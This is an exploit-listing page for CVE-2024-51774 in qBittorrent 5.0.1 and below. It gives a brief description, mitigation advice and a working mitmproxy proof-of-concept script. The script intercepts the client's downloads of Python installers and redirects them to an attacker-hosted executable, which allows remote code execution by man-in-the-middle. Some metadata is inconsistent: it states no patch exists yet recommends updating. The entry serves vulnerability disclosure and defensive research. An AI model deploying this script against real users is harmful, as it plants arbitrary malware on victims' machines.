header-logo
Suggest Exploit
vendor:
qBittorrent
by:
Jordan Sharp
6.1
CVSS
HIGH
Remote Code Execution (RCE)
284
CWE
Product Name: qBittorrent
Affected Version From: Below 5.0.1
Affected Version To: 5.0.1
Patch Exists: NO
Related CWE: CVE-2024-51774
CPE: a:qbittorrent_foundation:qbittorrent:5.0.0
Metasploit:
Other Scripts:
Platforms Tested: Windows 10
2025

qBittorrent 5.0.1 MITM Remote Code Execution

The exploit allows an attacker to perform Remote Code Execution on qBittorrent version 5.0.1 and below by intercepting the host machine using a Man-In-The-Middle (MITM) attack. By running the Proof of Concept (PoC) exploit, the attacker can inject any malicious executable instead of the legitimate Python installer.

Mitigation:

To mitigate this vulnerability, users should update qBittorrent to version 5.0.1 or above and avoid connecting to untrusted networks where MITM attacks can be performed.
Source

Exploit-DB raw data:

# Exploit Title: qBittorrent 5.0.1 MITM RCE
# Date: 01/02/2025
# Exploit Author: Jordan Sharp
# Vendor Homepage: https://github.com/qbittorrent/qBittorrent
# Software Link: https://www.qbittorrent.org/download
# Version: < 5.0.1
# Tested on: Windows 10
# CVE : CVE-2024-51774

Run the PoC on a MITM machine intercepting the host

"""PoC exploit for CVE-2024-51774"""
from mitmproxy import http

targets = [
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11-amd64.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10-amd64.exe",
    "https://www.python.org/ftp/python/3.10.11/python-3.10.11.exe",
    "https://www.python.org/ftp/python/3.8.10/python-3.8.10.exe",
    "https://www.python.org/ftp/python/3.4.3/python-3.4.3.msi",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5-amd64.exe",
    "https://www.python.org/ftp/python/3.8.5/python-3.8.5.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1-amd64.exe",
    "https://www.python.org/ftp/python/3.8.1/python-3.8.1.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4-amd64.exe",
    "https://www.python.org/ftp/python/3.7.4/python-3.7.4.exe",
    "https://www.python.org/ftp/python/3.6.6/python-3.6.6.exe",
    "https://www.python.org/ftp/python/3.12.4/python-3.12.4-amd64.exe",
    "https://www.python.org/ftp/python/3.4.4/python-3.4.4.msi",
    "https://www.python.org/ftp/python/3.5.2/python-3.5.2.exe"
]

SUBSTITUTE_URL = "http://192.168.50.2:6666/calc.exe"

def request(flow: http.HTTPFlow) -> None:
    """
    Inject any exe instead of a Python installer.
    """
    if flow.request.pretty_url in targets:
        flow.request.url = SUBSTITUTE_URL

Navigation

Suggest Exploit

Services By CQR